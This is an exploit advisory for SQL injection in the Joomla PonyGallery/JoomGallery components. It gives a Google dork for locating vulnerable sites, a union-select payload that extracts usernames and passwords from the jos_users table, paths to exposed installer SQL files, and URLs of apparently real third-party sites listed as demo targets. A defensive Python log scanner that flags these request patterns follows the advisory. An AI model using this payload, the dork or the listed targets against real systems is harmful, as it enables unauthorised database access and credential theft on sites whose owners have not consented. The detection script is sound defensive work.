
Joomla SQLI DORK #2 ON 2019

# Exploit Title: [Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection ]
# Google Dork: inurl:''/index.php?option=com_ponygallery''
# Date: 2/13/2019
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: joomlander.net - joomlacode.org
# Software Link: github.com/JoomGallery/JoomGallery/archive/master.zip
# Version: 3.3.0 3.2.2 for Joomla 3.x and previous versions.
# Tested on: win,linux
######################################################################################

# Exploit :
**********************
/index.php?option=com_ponygallery&Itemid=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[SQL Injection]
/index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special

# Example Payload :
*************************************
%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

# Database Disclosure Exploit :
***************************
/administrator/components/com_joomgallery/sql/install.mysql.utf8.sql
/administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql

# Exploit
/administrator/components/com_joomgallery/sql/updates/mysql/[Version].sql
version : (2.0.0 , 2.0.0 , 2.1.0 , 3.0.0 , 3.1.0 , 3.2.0 , 3.2.1, 3.3.0 )
for Example :
/administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql

####################################################################
[+] Demo : skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en
[+] Demo : okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en
[+] Demo : cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27
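For site owners checking whether these request patterns have reached their own server, a log triage sketch follows. It is an added example, not part of the original advisory: the log lines are constructed, and the helper names classify and scan are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines; IPs are documentation addresses, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_ponygallery&Itemid=38 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Feb/2019:10:00:07 +0000] "GET /index.php?option=com_ponygallery&Itemid=38%27 HTTP/1.1" 500 310
203.0.113.9 - - [13/Feb/2019:10:00:09 +0000] "GET /index.php?option=com_joomgallery&func=viewcategory&catid=7&Itemid=44%20union%20select%201,2,3 HTTP/1.1" 200 4096
203.0.113.20 - - [13/Feb/2019:10:02:30 +0000] "GET /joomla/administrator/components/com_joomgallery/sql/install.mysql.utf8.sql HTTP/1.1" 200 18233
198.51.100.7 - - [13/Feb/2019:10:03:00 +0000] "GET /index.php?option=com_content&Itemid=abc HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
GALLERY_OPTIONS = {"com_ponygallery", "com_joomgallery"}
# Installer/updater SQL files that should never be served to a browser.
SQL_FILE_RE = re.compile(
    r"/administrator/components/com_joomgallery/sql/.+\.sql$", re.I)

def classify(line):
    """Return a finding label for one log line, or None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if SQL_FILE_RE.search(unquote(url.path)):
        return "sql-file-exposure"
    params = parse_qs(url.query)  # percent-decodes values, e.g. %27 -> '
    if not GALLERY_OPTIONS & set(params.get("option", [])):
        return None
    # Itemid is a numeric menu id; any other character is suspicious here.
    for value in params.get("Itemid", []):
        if not re.fullmatch(r"[0-9]+", value):
            return "non-integer-itemid"
    return None

def scan(log_text):
    """Return (client_ip, finding) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        verdict = classify(line)
        if verdict:
            findings.append((line.split(" ", 1)[0], verdict))
    return findings

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A 200 response on a flagged .sql request means the file is being served and the web server should deny direct access to that directory.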